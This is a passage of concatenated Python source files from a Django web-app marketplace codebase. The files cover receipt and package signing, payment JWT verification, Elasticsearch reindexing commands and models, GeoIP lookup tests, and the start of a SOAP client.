            raise
    log.info('[Webapp:%s] Signing complete.' % app.id)
    return path
########NEW FILE########
__FILENAME__ = receipt
import json
import urllib2
from django.conf import settings
from django_statsd.clients import statsd
import commonware.log
import jwt
log = commonware.log.getLogger('z.crypto')
class SigningError(Exception):
    """Raised when receipt signing fails at any stage."""
    pass
def sign(receipt):
    """
    Send the receipt to the signing service and return the signed receipt.

    This could possibly be made async via celery.

    Raises ValueError when SIGNING_SERVER is not configured, and
    SigningError when the signing service fails or rejects the request.
    """
    # If no destination is set, this is a configuration error.  The
    # original code *returned* the ValueError instance instead of raising
    # it, so callers silently received an exception object in place of a
    # signed receipt.
    if not settings.SIGNING_SERVER:
        raise ValueError('Invalid config. SIGNING_SERVER empty.')
    destination = settings.SIGNING_SERVER + '/1.0/sign'
    timeout = settings.SIGNING_SERVER_TIMEOUT
    receipt_json = json.dumps(receipt)
    log.info('Calling service: %s' % destination)
    log.info('Receipt contents: %s' % receipt_json)
    headers = {'Content-Type': 'application/json'}
    # Pre-serialized receipts are posted as-is.
    data = receipt if isinstance(receipt, basestring) else receipt_json
    request = urllib2.Request(destination, data, headers)
    try:
        with statsd.timer('services.sign.receipt'):
            response = urllib2.urlopen(request, timeout=timeout)
    except urllib2.HTTPError as error:
        # Will occur when a 3xx or greater code is returned.
        msg = error.read().strip()
        log.error('Posting to receipt signing failed: %s, %s'
                  % (error.code, msg))
        raise SigningError('Posting to receipt signing failed: %s, %s'
                           % (error.code, msg))
    except:
        # Will occur when some other error occurs.
        log.error('Posting to receipt signing failed', exc_info=True)
        raise SigningError('Posting receipt signing failed')
    if response.getcode() != 200:
        # Anything other than a strict 200 (even other 2xx) is a failure.
        log.error('Posting to signing failed: %s'
                  % (response.getcode()))
        raise SigningError('Posting to signing failed: %s'
                           % (response.getcode()))
    return json.loads(response.read())['receipt']
def decode(receipt):
    """
    Decode and verify that the receipt is sound from a crypto point of view.
    Will raise errors if the receipt is not valid, returns receipt contents
    if it is valid.
    """
    # Not implemented yet; use crack() to inspect a receipt without
    # cryptographic verification.
    raise NotImplementedError
def crack(receipt):
    """
    Crack open the receipt, without checking that the crypto is valid.
    Returns a list of all the elements of a receipt, which by default is
    cert, receipt.
    """
    # Receipts are '~'-separated JWTs; decode each one without verifying.
    return [jwt.decode(element.encode('ascii'), verify=False)
            for element in receipt.split('~')]
########NEW FILE########
__FILENAME__ = tests
# -*- coding: utf-8 -*-
import json
import os
import shutil
import zipfile
from django.conf import settings # For mocking.
from django.core.files.storage import default_storage as storage
import jwt
import mock
from nose.tools import eq_, raises
import amo.tests
from lib.crypto import packaged
from lib.crypto.receipt import crack, sign, SigningError
from mkt.webapps.models import Webapp
from versions.models import Version
from mkt.site.fixtures import fixture
def mock_sign(version_id, reviewer=False):
    """
    This is a mock for using in tests, where we really don't want to be
    actually signing the apps. This just copies the file over and returns
    the path. It doesn't have much error checking.
    """
    version = Version.objects.get(pk=version_id)
    file_obj = version.all_files[0]
    # Pick the reviewer or public signed path, mirroring packaged.sign().
    path = (file_obj.signed_reviewer_file_path if reviewer else
            file_obj.signed_file_path)
    try:
        os.makedirs(os.path.dirname(path))
    except OSError:
        # Directory already exists.
        pass
    shutil.copyfile(file_obj.file_path, path)
    return path
@mock.patch('lib.crypto.receipt.urllib2.urlopen')
@mock.patch.object(settings, 'SIGNING_SERVER', 'http://localhost')
class TestReceipt(amo.tests.TestCase):
    """Tests for receipt signing against a mocked signing service."""

    def test_called(self, urlopen):
        urlopen.return_value = self.get_response(200)
        sign('my-receipt')
        eq_(urlopen.call_args[0][0].data, 'my-receipt')

    def test_some_unicode(self, urlopen):
        urlopen.return_value = self.get_response(200)
        sign({'name': u'Вагиф Сәмәдоғлу'})

    def get_response(self, code):
        # Build a fake urlopen response with the given HTTP status code.
        response = mock.Mock()
        response.getcode = mock.Mock()
        response.getcode.return_value = code
        response.read.return_value = json.dumps({'receipt': ''})
        return response

    @raises(SigningError)
    def test_error(self, urlopen):
        urlopen.return_value = self.get_response(403)
        sign('x')

    def test_good(self, urlopen):
        urlopen.return_value = self.get_response(200)
        sign('x')

    @raises(SigningError)
    def test_other(self, urlopen):
        # Any non-200 response (even other 2xx) counts as a failure.
        urlopen.return_value = self.get_response(206)
        sign('x')
class TestCrack(amo.tests.TestCase):
    """Tests for crack(): unverified decoding of '~'-separated JWTs."""

    def test_crack(self):
        eq_(crack(jwt.encode('foo', 'x')), [u'foo'])

    def test_crack_mulitple(self):
        eq_(crack('~'.join([jwt.encode('foo', 'x'), jwt.encode('bar', 'y')])),
            [u'foo', u'bar'])
class PackagedApp(amo.tests.TestCase, amo.tests.AMOPaths):
    """Base test case that sets up a packaged app backed by a real zip."""

    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(is_packaged=True)
        self.version = self.app.current_version
        self.file = self.version.all_files[0]
        self.file.update(filename='mozball.zip')

    def setup_files(self):
        # Clean out any left over stuff.
        storage.delete(self.file.signed_file_path)
        storage.delete(self.file.signed_reviewer_file_path)
        # Make sure the source file is there.
        if not storage.exists(self.file.file_path):
            try:
                # We don't care if these dirs exist.
                os.makedirs(os.path.dirname(self.file.file_path))
            except OSError:
                pass
            shutil.copyfile(self.packaged_app_path('mozball.zip'),
                            self.file.file_path)
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
class TestPackaged(PackagedApp, amo.tests.TestCase):
    """Tests for packaged.sign() and its endpoint/server configuration."""

    def setUp(self):
        super(TestPackaged, self).setUp()
        self.setup_files()

    @raises(packaged.SigningError)
    def test_not_app(self):
        self.app.update(type=amo.ADDON_EXTENSION)
        packaged.sign(self.version.pk)

    @raises(packaged.SigningError)
    def test_not_packaged(self):
        self.app.update(is_packaged=False)
        packaged.sign(self.version.pk)

    @raises(packaged.SigningError)
    def test_no_file(self):
        [f.delete() for f in self.app.current_version.all_files]
        packaged.sign(self.version.pk)

    @mock.patch('lib.crypto.packaged.sign_app')
    def test_already_exists(self, sign_app):
        storage.open(self.file.signed_file_path, 'w')
        assert packaged.sign(self.version.pk)
        # Already signed: no call to the signing machinery.
        assert not sign_app.called

    @mock.patch('lib.crypto.packaged.sign_app')
    def test_resign_already_exists(self, sign_app):
        storage.open(self.file.signed_file_path, 'w')
        packaged.sign(self.version.pk, resign=True)
        assert sign_app.called

    @raises(ValueError)
    def test_server_active(self):
        # Server active but no server URL configured -> ValueError.
        with self.settings(SIGNED_APPS_SERVER_ACTIVE=True):
            packaged.sign(self.version.pk)

    @raises(ValueError)
    def test_reviewer_server_active(self):
        with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=True):
            packaged.sign(self.version.pk, reviewer=True)

    @mock.patch('lib.crypto.packaged._no_sign')
    def test_server_inactive(self, _no_sign):
        with self.settings(SIGNED_APPS_SERVER_ACTIVE=False):
            packaged.sign(self.version.pk)
        assert _no_sign.called

    @mock.patch('lib.crypto.packaged._no_sign')
    def test_reviewer_server_inactive(self, _no_sign):
        with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=False):
            packaged.sign(self.version.pk, reviewer=True)
        assert _no_sign.called

    def test_server_endpoint(self):
        with self.settings(SIGNED_APPS_SERVER_ACTIVE=True,
                           SIGNED_APPS_SERVER='http://sign.me',
                           SIGNED_APPS_REVIEWER_SERVER='http://review.me'):
            endpoint = packaged._get_endpoint()
            assert endpoint.startswith('http://sign.me'), (
                'Unexpected endpoint returned.')

    def test_server_reviewer_endpoint(self):
        with self.settings(SIGNED_APPS_REVIEWER_SERVER_ACTIVE=True,
                           SIGNED_APPS_SERVER='http://sign.me',
                           SIGNED_APPS_REVIEWER_SERVER='http://review.me'):
            endpoint = packaged._get_endpoint(reviewer=True)
            assert endpoint.startswith('http://review.me'), (
                'Unexpected endpoint returned.')

    @mock.patch.object(packaged, '_get_endpoint', lambda _: '/fake/url/')
    @mock.patch('requests.post')
    def test_inject_ids(self, post):
        post().status_code = 200
        post().content = '{"zigbert.rsa": ""}'
        packaged.sign(self.version.pk)
        zf = zipfile.ZipFile(self.file.signed_file_path, mode='r')
        ids_data = zf.read('META-INF/ids.json')
        eq_(sorted(json.loads(ids_data).keys()), ['id', 'version'])
########NEW FILE########
__FILENAME__ = util
import os
__all__ = ['generate_key']
def generate_key(byte_length):
    """Return a true random ascii string containing byte_length of randomness.

    The resulting key is suitable for cryptography.

    The key will be hex encoded which means it will be twice as long
    as byte_length, i.e. 40 random bytes yields an 80 byte string.

    byte_length must be at least 32.
    """
    import binascii
    if byte_length < 32:  # at least 256 bit
        raise ValueError('um, %s is probably not long enough for cryptography'
                         % byte_length)
    # bytes.encode('hex') only exists on Python 2; binascii.hexlify is the
    # portable equivalent.  The digest is pure ascii, so decoding is safe.
    return binascii.hexlify(os.urandom(byte_length)).decode('ascii')
########NEW FILE########
__FILENAME__ = webpay
import hashlib
import uuid
from django.conf import settings
import commonware.log
from mozpay.verify import verify_claims, verify_keys
import jwt
log = commonware.log.getLogger('z.crypto')
class InvalidSender(Exception):
    """Raised when a webpay postback JWT fails signature verification."""
    pass
def get_uuid():
    """Return a unique id of the form 'webpay:<32-char md5 hexdigest>'."""
    # hashlib.md5 requires bytes on Python 3; a UUID's string form is
    # plain ascii, so encoding it is loss-free (and a no-op on Python 2).
    return 'webpay:%s' % hashlib.md5(
        str(uuid.uuid4()).encode('ascii')).hexdigest()
def verify_webpay_jwt(signed_jwt):
    """Return {'valid': bool} for a JWT signed with APP_PURCHASE_SECRET."""
    # This can probably be deleted depending upon solitude.
    try:
        jwt.decode(signed_jwt.encode('ascii'), settings.APP_PURCHASE_SECRET)
    except Exception, e:
        log.error('Error decoding webpay jwt: %s' % e, exc_info=True)
        return {'valid': False}
    return {'valid': True}
def sign_webpay_jwt(data):
    """Encode ``data`` as a JWT signed with the shared webpay secret."""
    return jwt.encode(data, settings.APP_PURCHASE_SECRET)
def parse_from_webpay(signed_jwt, ip):
    """Decode and validate a webpay postback JWT; return the claims dict.

    Raises InvalidSender when the JWT signature is invalid; claim/key
    validation errors propagate from mozpay.verify.
    """
    try:
        data = jwt.decode(signed_jwt.encode('ascii'),
                          settings.APP_PURCHASE_SECRET)
    except Exception, e:
        log.info('Received invalid webpay postback from IP %s: %s' %
                 (ip or '(unknown)', e), exc_info=True)
        raise InvalidSender()
    verify_claims(data)
    iss, aud, product_data, trans_id = verify_keys(
        data,
        ('iss', 'aud', 'request.productData', 'response.transactionID'))
    log.info('Received webpay postback JWT: iss:%s aud:%s '
             'trans_id:%s product_data:%s'
             % (iss, aud, trans_id, product_data))
    return data
########NEW FILE########
__FILENAME__ = fixup_mkt_index
"""
A Marketplace only command that finds apps missing from the search index and
adds them.
"""
import sys
from pyelasticsearch.exceptions import ElasticHttpNotFoundError
from django.core.management.base import BaseCommand
from addons.models import Webapp # To avoid circular import.
from mkt.webapps.models import WebappIndexer
from mkt.webapps.tasks import index_webapps
class Command(BaseCommand):
    help = 'Fix up Marketplace index.'

    def handle(self, *args, **kwargs):
        """Find apps missing from the ES index and queue them for indexing.

        Removed the unused ``res`` local: we only care whether the GET
        raises ElasticHttpNotFoundError, not about its return value.
        """
        index = WebappIndexer.get_index()
        doctype = WebappIndexer.get_mapping_type_name()
        es = WebappIndexer.get_es()

        apps = Webapp.objects.values_list('id', flat=True)

        missing_ids = []
        for app in apps:
            try:
                # Existence check only; fetch just the id field.
                es.get(index, doctype, app, fields='id')
            except ElasticHttpNotFoundError:
                # App doesn't exist in our index, add it to `missing_ids`.
                missing_ids.append(app)

        if missing_ids:
            sys.stdout.write('Adding %s doc(s) to the index.'
                             % len(missing_ids))
            index_webapps.delay(missing_ids)
        else:
            sys.stdout.write('No docs missing from index.')
########NEW FILE########
__FILENAME__ = reindex_app
"""
A Marketplace only command to re-index a specific app or apps.
Call like:
./manage.py reindex_app --apps=1234
Or call with a comma separated list of ids:
./manage.py reindex_app --apps=1234,2345,3456
"""
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from mkt.webapps.tasks import index_webapps
log = logging.getLogger('z.elasticsearch')
class Command(BaseCommand):
    option_list = BaseCommand.option_list + (
        make_option('--apps',
                    help='Webapp ids to process. Use commas to separate '
                         'multiple ids.'),
    )

    # The module docstring doubles as the command help text.
    help = __doc__

    def handle(self, *args, **kw):
        """Queue the given comma-separated webapp ids for reindexing."""
        apps = kw.get('apps')
        if not apps:
            raise CommandError('The --apps option is required.')
        ids = [int(a.strip()) for a in apps.split(',')]
        index_webapps.delay(ids)
########NEW FILE########
__FILENAME__ = reindex_mkt
"""
A Marketplace only reindexing that indexes only apps.
This avoids a lot of complexity for now. We might want an all encompassing
reindex command that has args for AMO and MKT.
"""
import logging
import os
import sys
import time
from optparse import make_option
import pyelasticsearch
from celery import task
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from amo.utils import chunked, timestamp_index
from addons.models import Webapp # To avoid circular import.
from lib.es.utils import (flag_reindexing_mkt, is_reindexing_mkt,
unflag_reindexing_mkt)
from mkt.webapps.models import WebappIndexer
logger = logging.getLogger('z.elasticsearch')
# Enable these to get full debugging information.
# logging.getLogger('pyelasticsearch').setLevel(logging.DEBUG)
# logging.getLogger('requests').setLevel(logging.DEBUG)
# The subset of settings.ES_INDEXES we are concerned with.
ALIAS = settings.ES_INDEXES['webapp']

if hasattr(settings, 'ES_URLS'):
    ES_URL = settings.ES_URLS[0]
else:
    # Sensible default for local development.
    ES_URL = 'http://127.0.0.1:9200'

ES = pyelasticsearch.ElasticSearch(ES_URL)

# Celery time limits for the indexing task are looked up by its full name.
job = 'lib.es.management.commands.reindex_mkt.run_indexing'
time_limits = settings.CELERY_TIME_LIMITS[job]
@task
def delete_index(old_index):
    """Removes the index."""
    sys.stdout.write('Removing index %r' % old_index)
    ES.delete_index(old_index)
@task
def create_index(new_index, alias, settings):
    """Creates a mapping for the new index.

    - new_index: new index name
    - alias: alias name
    - settings: a dictionary of settings

    NOTE: the ``settings`` parameter shadows django.conf.settings inside
    this function; only the passed-in ES settings dict is used here.
    """
    sys.stdout.write(
        'Create the mapping for index %r, alias: %r' % (new_index, alias))
    # Update settings with mapping.
    settings = {
        'settings': settings,
        'mappings': WebappIndexer.get_mapping(),
    }
    # Create index and mapping.
    try:
        ES.create_index(new_index, settings)
    except pyelasticsearch.exceptions.IndexAlreadyExistsError:
        raise CommandError('New index [%s] already exists' % new_index)
    # Don't return until the health is green. By default waits for 30s.
    ES.health(new_index, wait_for_status='green', wait_for_relocating_shards=0)
def index_webapp(ids, **kw):
    """Extract ES documents for the given webapp ids and bulk-index them."""
    index = kw.pop('index', None) or ALIAS
    sys.stdout.write('Indexing %s apps' % len(ids))
    qs = Webapp.indexing_transformer(Webapp.with_deleted.no_cache()
                                     .filter(id__in=ids))
    docs = []
    for obj in qs:
        try:
            docs.append(WebappIndexer.extract_document(obj.id, obj=obj))
        except Exception as e:
            # One bad app shouldn't abort the whole chunk; log and move on.
            sys.stdout.write('Failed to index obj: {0}. {1}'.format(obj.id, e))
    WebappIndexer.bulk_index(docs, es=ES, index=index)
@task(time_limit=time_limits['hard'], soft_time_limit=time_limits['soft'])
def run_indexing(index):
    """Index the objects.

    - index: name of the index

    Note: Our ES doc sizes are about 5k in size. Chunking by 100 sends ~500kb
    of data to ES at a time.

    TODO: Use celery chords here to parallelize these indexing chunks. This
    requires celery 3 (bug 825938).
    """
    sys.stdout.write('Indexing apps into index: %s' % index)
    qs = WebappIndexer.get_indexable()
    for chunk in chunked(list(qs), 100):
        index_webapp(chunk, index=index)
@task
def flag_database(new_index, old_index, alias):
    """Record in the database that a reindexation is now in progress."""
    sys.stdout.write('Flagging the database to start the reindexation')
    flag_reindexing_mkt(alias=alias, new_index=new_index,
                        old_index=old_index)
    # Give celeryd some time to flag the DB.
    time.sleep(5)
@task
def unflag_database():
    """Clear the database flag once the reindexing is over."""
    sys.stdout.write('Unflagging the database')
    unflag_reindexing_mkt()
@task
def update_alias(new_index, old_index, alias, settings):
    """
    Finalize the new index once indexing is over.

    We do 3 things:

    1. Optimize (which also does a refresh and a flush by default).
    2. Update settings to reset number of replicas.
    3. Point the alias to this new index.
    """
    sys.stdout.write('Optimizing, updating settings and aliases.')

    # Optimize (also refreshes and flushes by default).
    ES.optimize(new_index)

    # Restore the replica count now that the bulk indexing is done.
    ES.update_settings(new_index, settings)

    # Point the alias at the new index, dropping the old one if present.
    actions = [{'add': {'index': new_index, 'alias': alias}}]
    if old_index:
        actions.append({'remove': {'index': old_index, 'alias': alias}})
    ES.update_aliases({'actions': actions})
@task
def output_summary():
    """Print the alias configuration now that reindexing is complete."""
    current = ES.aliases(ALIAS)
    sys.stdout.write(
        'Reindexation done. Current Aliases configuration: %s\n' % current)
class Command(BaseCommand):
    help = 'Reindex all ES indexes'
    option_list = BaseCommand.option_list + (
        make_option('--prefix', action='store',
                    help='Indexes prefixes, like test_',
                    default=''),
        make_option('--force', action='store_true',
                    help=('Bypass the database flag that says '
                          'another indexation is ongoing'),
                    default=False),
    )

    def handle(self, *args, **kwargs):
        """Set up reindexing tasks.

        Creates a Tasktree that creates a new indexes and indexes all objects,
        then points the alias to this new index when finished.

        The steps are chained as immutable celery signatures (``.si``) so
        they run strictly one after another with fixed arguments.
        """
        force = kwargs.get('force', False)
        prefix = kwargs.get('prefix', '')

        if is_reindexing_mkt() and not force:
            raise CommandError('Indexation already occuring - use --force to '
                               'bypass')
        elif force:
            # A previous run left the flag set; clear it before starting.
            unflag_database()

        # The list of indexes that is currently aliased by `ALIAS`.
        try:
            aliases = ES.aliases(ALIAS).keys()
        except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
            aliases = []
        # Only the first aliased index is considered "the" old index.
        old_index = aliases[0] if aliases else None

        # Create a new index, using the index name with a timestamp.
        new_index = timestamp_index(prefix + ALIAS)

        # See how the index is currently configured.
        if old_index:
            try:
                s = (ES.get_settings(old_index).get(old_index, {})
                                               .get('settings', {}))
            except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
                s = {}
        else:
            s = {}

        # Carry the old index's shard/replica counts over, falling back to
        # the site defaults.
        num_replicas = s.get('number_of_replicas',
                             settings.ES_DEFAULT_NUM_REPLICAS)
        num_shards = s.get('number_of_shards', settings.ES_DEFAULT_NUM_SHARDS)

        # Flag the database.
        chain = flag_database.si(new_index, old_index, ALIAS)

        # Create the index and mapping.
        #
        # Note: We set num_replicas=0 here to decrease load while re-indexing.
        # In a later step we increase it which results in a more efficient bulk
        # copy in Elasticsearch.
        # For ES < 0.90 we manually enable compression.
        chain |= create_index.si(new_index, ALIAS, {
            'analysis': WebappIndexer.get_analysis(),
            'number_of_replicas': 0, 'number_of_shards': num_shards,
            'store.compress.tv': True, 'store.compress.stored': True,
            'refresh_interval': '-1'})

        # Index all the things!
        chain |= run_indexing.si(new_index)

        # After indexing we optimize the index, adjust settings, and point the
        # alias to the new index.
        chain |= update_alias.si(new_index, old_index, ALIAS, {
            'number_of_replicas': num_replicas, 'refresh_interval': '5s'})

        # Unflag the database.
        chain |= unflag_database.si()

        # Delete the old index, if any.
        if old_index:
            chain |= delete_index.si(old_index)

        chain |= output_summary.si()

        self.stdout.write('\nNew index and indexing tasks all queued up.\n')
        # NOTE(review): FORCE_INDEXING is only set while queueing the chain;
        # consumers of this env var are not visible here -- confirm.
        os.environ['FORCE_INDEXING'] = '1'
        try:
            chain.apply_async()
        finally:
            del os.environ['FORCE_INDEXING']
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django.utils import timezone
class ReindexingManager(models.Manager):
    """Used to flag when an elasticsearch reindexing is occurring."""

    def _flag_reindexing(self, site, new_index, old_index, alias):
        """Flag the database for a reindex on the given site."""
        if self._is_reindexing(site):
            # Already flagged; leave the existing row alone.
            return
        return self.create(site=site, alias=alias,
                           new_index=new_index, old_index=old_index)

    def flag_reindexing_amo(self, new_index, old_index, alias):
        """Flag the database for an AMO reindex."""
        return self._flag_reindexing('amo', new_index, old_index, alias)

    def flag_reindexing_mkt(self, new_index, old_index, alias):
        """Flag the database for a MKT reindex."""
        return self._flag_reindexing('mkt', new_index, old_index, alias)

    def _unflag_reindexing(self, site):
        """Unflag the database for a reindex on the given site."""
        self.filter(site=site).delete()

    def unflag_reindexing_amo(self):
        """Unflag the database for an AMO reindex."""
        self._unflag_reindexing('amo')

    def unflag_reindexing_mkt(self):
        """Unflag the database for a MKT reindex."""
        self._unflag_reindexing('mkt')

    def _is_reindexing(self, site):
        """Return True if a reindexing is occurring for the given site."""
        return self.filter(site=site).exists()

    def is_reindexing_amo(self):
        """Return True if a reindexing is occurring on AMO."""
        return self._is_reindexing('amo')

    def is_reindexing_mkt(self):
        """Return True if a reindexing is occurring on MKT."""
        return self._is_reindexing('mkt')

    def get_indices(self, index):
        """Return the indices associated with an alias.

        If we are reindexing, there should be two indices returned.
        """
        try:
            ongoing = self.get(alias=index)
        except Reindexing.DoesNotExist:
            # No reindex in flight: the alias maps straight to one index.
            return [index]
        # Reindexing: hit both the new and (if present) old index.
        return [idx for idx in (ongoing.new_index, ongoing.old_index)
                if idx is not None]
class Reindexing(models.Model):
    """One row per in-flight reindex, keyed by site ('amo' or 'mkt')."""
    SITE_CHOICES = (
        ('amo', 'AMO'),
        ('mkt', 'MKT'),
    )

    # When the reindex was flagged.
    start_date = models.DateTimeField(default=timezone.now)
    # Index being replaced; nullable (there may be no previous index).
    old_index = models.CharField(max_length=255, null=True)
    # Index being built.
    new_index = models.CharField(max_length=255)
    # The ES alias both indices hang off.
    alias = models.CharField(max_length=255)
    site = models.CharField(max_length=3, choices=SITE_CHOICES)

    objects = ReindexingManager()

    class Meta:
        db_table = 'zadmin_reindexing'
########NEW FILE########
__FILENAME__ = test_models
import mock
from nose.tools import eq_
import amo.tests
from lib.es.models import Reindexing
class TestReindexManager(amo.tests.TestCase):
    """Unit tests for ReindexingManager's flag/unflag/query helpers.

    Bug fix: the original assertions used ``assert some_mock.called_with(...)``
    -- ``called_with`` is an auto-created Mock attribute whose call returns a
    (truthy) Mock, so those assertions could never fail. They are replaced
    with real ``assert_called_with(...)`` checks.
    """

    def test_flag_reindexing(self):
        assert Reindexing.objects.filter(site='foo').count() == 0

        # Flagging for the first time.
        res = Reindexing.objects._flag_reindexing('foo', 'bar', 'baz', 'quux')
        eq_(Reindexing.objects.filter(site='foo').count(), 1)
        eq_(res.site, 'foo')
        eq_(res.new_index, 'bar')
        eq_(res.old_index, 'baz')
        eq_(res.alias, 'quux')

        # Flagging for the second time is a no-op and returns None.
        res = Reindexing.objects._flag_reindexing('foo', 'bar', 'baz', 'quux')
        assert Reindexing.objects.filter(site='foo').count() == 1
        assert res is None

    @mock.patch('lib.es.models.ReindexingManager._flag_reindexing')
    def test_flag_reindexing_amo(self, flag_reindexing_mock):
        Reindexing.objects.flag_reindexing_amo('bar', 'baz', 'quux')
        flag_reindexing_mock.assert_called_with('amo', 'bar', 'baz', 'quux')

    @mock.patch('lib.es.models.ReindexingManager._flag_reindexing')
    def test_flag_reindexing_mkt(self, flag_reindexing_mock):
        # This test doesn't run with AMO settings, no idea why.
        Reindexing.objects.flag_reindexing_mkt('bar', 'baz', 'quux')
        flag_reindexing_mock.assert_called_with('mkt', 'bar', 'baz', 'quux')

    def test_unflag_reindexing(self):
        assert Reindexing.objects.filter(site='foo').count() == 0

        # Unflagging unflagged database does nothing.
        Reindexing.objects._unflag_reindexing('foo')
        assert Reindexing.objects.filter(site='foo').count() == 0

        # Flag, then unflag.
        Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
                                  alias='quux')
        assert Reindexing.objects.filter(site='foo').count() == 1
        Reindexing.objects._unflag_reindexing('foo')
        assert Reindexing.objects.filter(site='foo').count() == 0

        # Unflagging another site doesn't clash.
        Reindexing.objects.create(site='bar', new_index='bar', old_index='baz',
                                  alias='quux')
        Reindexing.objects._unflag_reindexing('foo')
        assert Reindexing.objects.filter(site='bar').count() == 1

    @mock.patch('lib.es.models.ReindexingManager._unflag_reindexing')
    def test_unflag_reindexing_amo(self, unflag_reindexing_mock):
        Reindexing.objects.unflag_reindexing_amo()
        unflag_reindexing_mock.assert_called_with('amo')

    @mock.patch('lib.es.models.ReindexingManager._unflag_reindexing')
    def test_unflag_reindexing_mkt(self, unflag_reindexing_mock):
        # This test doesn't run with AMO settings, no idea why.
        Reindexing.objects.unflag_reindexing_mkt()
        unflag_reindexing_mock.assert_called_with('mkt')

    def test_is_reindexing(self):
        assert Reindexing.objects.filter(site='foo').count() == 0
        assert not Reindexing.objects._is_reindexing('foo')

        Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
                                  alias='quux')
        assert Reindexing.objects._is_reindexing('foo')

        # Reindexing on another site doesn't clash.
        assert not Reindexing.objects._is_reindexing('bar')

    @mock.patch('lib.es.models.ReindexingManager._is_reindexing')
    def test_is_reindexing_amo(self, is_reindexing_mock):
        Reindexing.objects.is_reindexing_amo()
        is_reindexing_mock.assert_called_with('amo')

    @mock.patch('lib.es.models.ReindexingManager._is_reindexing')
    def test_is_reindexing_mkt(self, is_reindexing_mock):
        # This test doesn't run with AMO settings, no idea why.
        Reindexing.objects.is_reindexing_mkt()
        is_reindexing_mock.assert_called_with('mkt')

    def test_get_indices(self):
        # Not reindexing.
        assert Reindexing.objects.filter(alias='foo').count() == 0
        assert Reindexing.objects.get_indices('foo') == ['foo']

        # Reindexing on 'foo'.
        Reindexing.objects.create(site='foo', new_index='bar', old_index='baz',
                                  alias='quux')
        assert Reindexing.objects.get_indices('quux') == ['bar', 'baz']

        # Doesn't clash on other sites.
        assert Reindexing.objects.get_indices('other') == ['other']
########NEW FILE########
__FILENAME__ = utils
from .models import Reindexing
# Shortcut functions.
# Bound-method aliases so callers can `from lib.es.utils import ...`
# without reaching into the model's manager directly.
is_reindexing_mkt = Reindexing.objects.is_reindexing_mkt
flag_reindexing_mkt = Reindexing.objects.flag_reindexing_mkt
unflag_reindexing_mkt = Reindexing.objects.unflag_reindexing_mkt
get_indices = Reindexing.objects.get_indices
########NEW FILE########
__FILENAME__ = test_geoip
from random import randint
import mock
import requests
from nose.tools import eq_
import amo.tests
from lib.geoip import GeoIP
def generate_settings(url='', default='restofworld', timeout=0.2):
    """Build a fake settings object with the GeoIP knobs filled in."""
    return mock.Mock(GEOIP_URL=url,
                     GEOIP_DEFAULT_VAL=default,
                     GEOIP_DEFAULT_TIMEOUT=timeout)
class GeoIPTest(amo.tests.TestCase):
    """GeoIP.lookup behaviour for success, failure and fallback paths."""

    @mock.patch('requests.post')
    def test_lookup(self, mock_post):
        url = 'localhost'
        geoip = GeoIP(generate_settings(url=url))
        mock_post.return_value = mock.Mock(status_code=200, json=lambda: {
            'country_code': 'US',
            'country_name': 'United States'
        })
        ip = '1.1.1.1'
        result = geoip.lookup(ip)
        mock_post.assert_called_with('{0}/country.json'.format(url),
                                     timeout=0.2, data={'ip': ip})
        # Country codes come back lowercased.
        eq_(result, 'us')

    @mock.patch('requests.post')
    def test_no_url(self, mock_post):
        # With no GEOIP_URL configured no request is made at all.
        geoip = GeoIP(generate_settings())
        result = geoip.lookup('2.2.2.2')
        assert not mock_post.called
        eq_(result, 'restofworld')

    @mock.patch('requests.post')
    def test_bad_request(self, mock_post):
        # Non-200 responses fall back to the configured default value.
        url = 'localhost'
        geoip = GeoIP(generate_settings(url=url))
        mock_post.return_value = mock.Mock(status_code=404, json=lambda: None)
        ip = '3.3.3.3'
        result = geoip.lookup(ip)
        mock_post.assert_called_with('{0}/country.json'.format(url),
                                     timeout=0.2, data={'ip': ip})
        eq_(result, 'restofworld')

    @mock.patch('requests.post')
    def test_timeout(self, mock_post):
        url = 'localhost'
        geoip = GeoIP(generate_settings(url=url))
        mock_post.side_effect = requests.Timeout
        ip = '3.3.3.3'
        result = geoip.lookup(ip)
        mock_post.assert_called_with('{0}/country.json'.format(url),
                                     timeout=0.2, data={'ip': ip})
        eq_(result, 'restofworld')

    @mock.patch('requests.post')
    def test_connection_error(self, mock_post):
        url = 'localhost'
        geoip = GeoIP(generate_settings(url=url))
        mock_post.side_effect = requests.ConnectionError
        ip = '3.3.3.3'
        result = geoip.lookup(ip)
        mock_post.assert_called_with('{0}/country.json'.format(url),
                                     timeout=0.2, data={'ip': ip})
        eq_(result, 'restofworld')

    @mock.patch('requests.post')
    def test_private_ip(self, mock_post):
        url = 'localhost'
        geoip = GeoIP(generate_settings(url=url))
        # Loopback plus randomly chosen addresses from the private ranges
        # 10/8, 192.168/16 and 172.16/12 must never trigger a network lookup.
        addrs = [
            '127.0.0.1',
            '10.{0}.{1}.{2}'.format(randint(0, 255), randint(0, 255),
                                    randint(0, 255)),
            '192.168.{0}.{1}'.format(randint(0, 255), randint(0, 255)),
            '172.{0}.{1}.{2}'.format(randint(16, 31), randint(0, 255),
                                     randint(0, 255))
        ]
        for ip in addrs:
            result = geoip.lookup(ip)
            assert not mock_post.called
            eq_(result, 'restofworld')
########NEW FILE########
__FILENAME__ = client
# -*- coding: utf8 -*-
import base64
import functools
import os
from django.conf import settings
import commonware.log
from django_statsd.clients import statsd
from suds import client as sudsclient
log = commonware.log.getLogger('z.iarc')

# Directory holding the WSDL files for the configured IARC environment.
root = os.path.join(settings.ROOT, 'lib', 'iarc', 'wsdl', settings.IARC_ENV)
# Map of wsdl name -> file:// URL handed to suds.
wsdl = {
    'services': 'file://' + os.path.join(root, 'iarc_services.wsdl'),
}

# Add in the whitelist of supported methods here.
services = ['Get_App_Info', 'Set_Storefront_Data', 'Get_Rating_Changes']
class Client(object):
    """
    IARC SOAP client.

    A wrapper around suds to make calls to IARC, leaving room for future WSDL
    expansion. Example usage::

        client = Client('services')
        response = client.Get_App_Info(XMLString=xml)
        print response  # response is already base64 decoded.

    """
    def __init__(self, wsdl_name):
